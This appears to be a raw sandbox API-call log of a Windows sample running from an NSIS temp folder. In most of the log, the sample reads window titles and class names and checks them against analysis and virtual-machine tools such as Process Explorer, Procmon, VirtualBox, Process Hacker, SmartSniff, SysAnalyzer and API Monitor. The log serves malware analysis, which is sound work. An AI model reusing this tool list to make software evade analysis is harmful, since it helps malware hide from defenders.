[0158.614] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.614] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="65694") returned 5 [0158.614] lstrcpyA (in: lpString1=0x430400, lpString2="65694" | out: lpString1="65694") returned="65694" [0158.615] lstrcpynA (in: lpString1=0x3401e0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.615] lstrcpynA (in: lpString1=0x33723c, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.615] lstrcpynA (in: lpString1=0x430000, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.615] lstrcpynA (in: lpString1=0x42e3a0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.615] lstrlenA (lpString="callback1") returned 9 [0158.615] lstrcpynA (in: lpString1=0x40ac18, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.615] lstrcpynA (in: lpString1=0x40b018, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.615] lstrcmpiA (lpString1="callback1", lpString2="callback1") returned 0 [0158.615] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.615] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.615] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.615] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.615] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.615] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.615] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.615] lstrcpynA (in: lpString1=0x33723c, lpString2="user32::GetWindowText(p r1, t.r2, i1024)", iMaxLength=1024 | out: lpString1="user32::GetWindowText(p r1, t.r2, i1024)") returned="user32::GetWindowText(p r1, t.r2, i1024)" [0158.616] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.616] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.616] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.616] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.616] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.616] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.616] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.616] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.616] lstrcpynA (in: lpString1=0x341200, lpString2="65694", iMaxLength=1024 | out: lpString1="65694") returned="65694" [0158.616] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.616] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.617] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.617] GetWindowTextA (in: hWnd=0x1009e, lpString=0x3401e0, nMaxCount=1024 | out: lpString="") returned 0 [0158.617] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="1024") returned 4 [0158.617] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.617] lstrcpyA (in: lpString1=0x430800, lpString2="" | out: lpString1="") returned="" [0158.617] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="65694") returned 5 [0158.617] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.617] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.617] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.617] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.617] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.617] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.617] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.617] lstrcpynA (in: lpString1=0x33723c, lpString2="user32::GetClassName(p r1, t.r3, i1024)", iMaxLength=1024 | out: lpString1="user32::GetClassName(p r1, t.r3, i1024)") returned="user32::GetClassName(p r1, t.r3, i1024)" [0158.617] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.617] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.618] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.618] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.618] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.618] lstrcpyA (in: lpString1=0x3401e0, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.618] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.618] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.618] lstrcpynA (in: lpString1=0x3401e0, lpString2="65694", iMaxLength=1024 | out: lpString1="65694") returned="65694" [0158.618] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.618] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.618] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.618] GetClassNameA (in: hWnd=0x1009e, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0158.618] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.618] lstrcpynA (in: lpString1=0x341200, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.618] lstrcpyA (in: lpString1=0x430c00, lpString2="tooltips_class32" | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.618] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="65694") returned 5 [0158.619] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.619] lstrlenA (lpString="0") returned 1 [0158.619] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.619] lstrlenA (lpString="tooltips_class32") returned 16 [0158.619] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.619] lstrcpynA (in: lpString1=0x40b018, lpString2="PROCEXPL", iMaxLength=1024 | out: lpString1="PROCEXPL") returned="PROCEXPL" [0158.619] lstrcmpiA (lpString1="tooltips_class32", lpString2="PROCEXPL") returned 1 [0158.619] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.619] lstrlenA (lpString="tooltips_class32") returned 16 [0158.619] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.619] lstrcpynA (in: lpString1=0x40b018, lpString2="PROCMON_WINDOW_CLASS", iMaxLength=1024 | out: lpString1="PROCMON_WINDOW_CLASS") returned="PROCMON_WINDOW_CLASS" [0158.619] lstrcmpiA (lpString1="tooltips_class32", lpString2="PROCMON_WINDOW_CLASS") returned 1 [0158.619] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.619] lstrlenA (lpString="tooltips_class32") returned 16 [0158.619] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.619] lstrcpynA (in: lpString1=0x40b018, lpString2="VBoxTrayToolWndClass", iMaxLength=1024 | out: lpString1="VBoxTrayToolWndClass") returned="VBoxTrayToolWndClass" [0158.619] lstrcmpiA (lpString1="tooltips_class32", lpString2="VBoxTrayToolWndClass") returned -1 [0158.619] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.619] lstrlenA (lpString="tooltips_class32") returned 16 [0158.619] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.619] lstrcpynA (in: lpString1=0x40b018, lpString2="VMSwitchUserControlClass", iMaxLength=1024 | out: lpString1="VMSwitchUserControlClass") returned="VMSwitchUserControlClass" [0158.619] lstrcmpiA (lpString1="tooltips_class32", lpString2="VMSwitchUserControlClass") returned -1 [0158.619] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.619] lstrlenA (lpString="tooltips_class32") returned 16 [0158.619] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.619] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessLasso_Notification_Class", iMaxLength=1024 | out: lpString1="ProcessLasso_Notification_Class") returned="ProcessLasso_Notification_Class" [0158.619] lstrcmpiA (lpString1="tooltips_class32", lpString2="ProcessLasso_Notification_Class") returned 1 [0158.619] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.619] lstrlenA (lpString="tooltips_class32") returned 16 [0158.619] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.619] lstrcpynA (in: lpString1=0x40b018, lpString2="SmartSniff", iMaxLength=1024 | out: lpString1="SmartSniff") returned="SmartSniff" [0158.619] lstrcmpiA (lpString1="tooltips_class32", lpString2="SmartSniff") returned 1 [0158.619] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.619] lstrlenA (lpString="tooltips_class32") returned 16 [0158.620] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.620] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessHacker", iMaxLength=1024 | out: lpString1="ProcessHacker") returned="ProcessHacker" [0158.620] lstrcmpiA (lpString1="tooltips_class32", lpString2="ProcessHacker") returned 1 [0158.620] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.620] lstrlenA (lpString="tooltips_class32") returned 16 [0158.620] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.620] lstrcpynA (in: lpString1=0x40b018, lpString2="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}", iMaxLength=1024 | out: lpString1="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}") returned="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}" [0158.620] lstrcmpiA (lpString1="tooltips_class32", lpString2="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}") returned 1 [0158.620] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.620] lstrlenA (lpString="tooltips_class32") returned 16 [0158.620] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.620] lstrcpynA (in: lpString1=0x40b018, lpString2="SysAnalyzer", iMaxLength=1024 | out: lpString1="SysAnalyzer") returned="SysAnalyzer" [0158.620] lstrcmpiA (lpString1="tooltips_class32", lpString2="SysAnalyzer") returned 1 [0158.620] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.620] lstrlenA (lpString="tooltips_class32") returned 16 [0158.620] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.620] lstrcpynA (in: lpString1=0x40b018, lpString2="VMSwitchUserControlClass", iMaxLength=1024 | out: lpString1="VMSwitchUserControlClass") returned="VMSwitchUserControlClass" [0158.620] lstrcmpiA (lpString1="tooltips_class32", lpString2="VMSwitchUserControlClass") returned -1 [0158.620] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.620] lstrlenA (lpString="tooltips_class32") returned 16 [0158.620] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.620] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessHacker", iMaxLength=1024 | out: lpString1="ProcessHacker") returned="ProcessHacker" [0158.620] lstrcmpiA (lpString1="tooltips_class32", lpString2="ProcessHacker") returned 1 [0158.620] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.620] lstrlenA (lpString="") returned 0 [0158.620] lstrcpynA (in: lpString1=0x40ac18, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.620] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.620] lstrcmpiA (lpString1="", lpString2="0") returned -1 [0158.620] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.620] lstrlenA (lpString="") returned 0 [0158.620] lstrcpynA (in: lpString1=0x33723c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.621] lstrcpynA (in: lpString1=0x337684, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.621] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.621] lstrlenA (lpString="3399936") returned 7 [0158.621] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.621] lstrcpynA (in: lpString1=0x40a418, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.621] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.621] lstrcpynA (in: lpString1=0x337acc, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.621] lstrcpynA (in: lpString1=0x432800, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.621] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.621] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.621] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.621] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.621] lstrlenA (lpString="") returned 0 [0158.621] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.621] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.621] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.621] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.621] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.621] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.621] lstrlenA (lpString="") returned 0 [0158.621] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.621] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.621] lstrlenA (lpString="") returned 0 [0158.621] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.622] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.622] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.622] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.622] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.622] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.622] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.622] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.622] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.631] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.632] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.632] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.632] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.634] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.635] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.635] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.635] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.635] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.635] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.635] lstrcpynA (in: lpString1=0x340df8, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.635] lstrcpynA (in: lpString1=0x3401e0, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.635] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.635] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.635] lstrcpynA (in: lpString1=0x340df8, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.635] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.636] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.636] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.636] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.636] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.636] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.636] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.636] lstrlenA (lpString="0") returned 1 [0158.636] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.636] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.636] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.636] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.636] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.636] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.636] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.644] lstrlenA (lpString="0") returned 1 [0158.644] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.644] lstrlenA (lpString="") returned 0 [0158.644] lstrcpynA (in: lpString1=0x33723c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.644] lstrcpynA (in: lpString1=0x337684, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.645] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.645] lstrlenA (lpString="3399936") returned 7 [0158.645] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.645] lstrcpynA (in: lpString1=0x40a418, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.645] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.645] lstrcpynA (in: lpString1=0x337acc, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.645] lstrcpynA (in: lpString1=0x432800, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.645] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.645] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.645] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.645] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.645] lstrlenA (lpString="") returned 0 [0158.645] 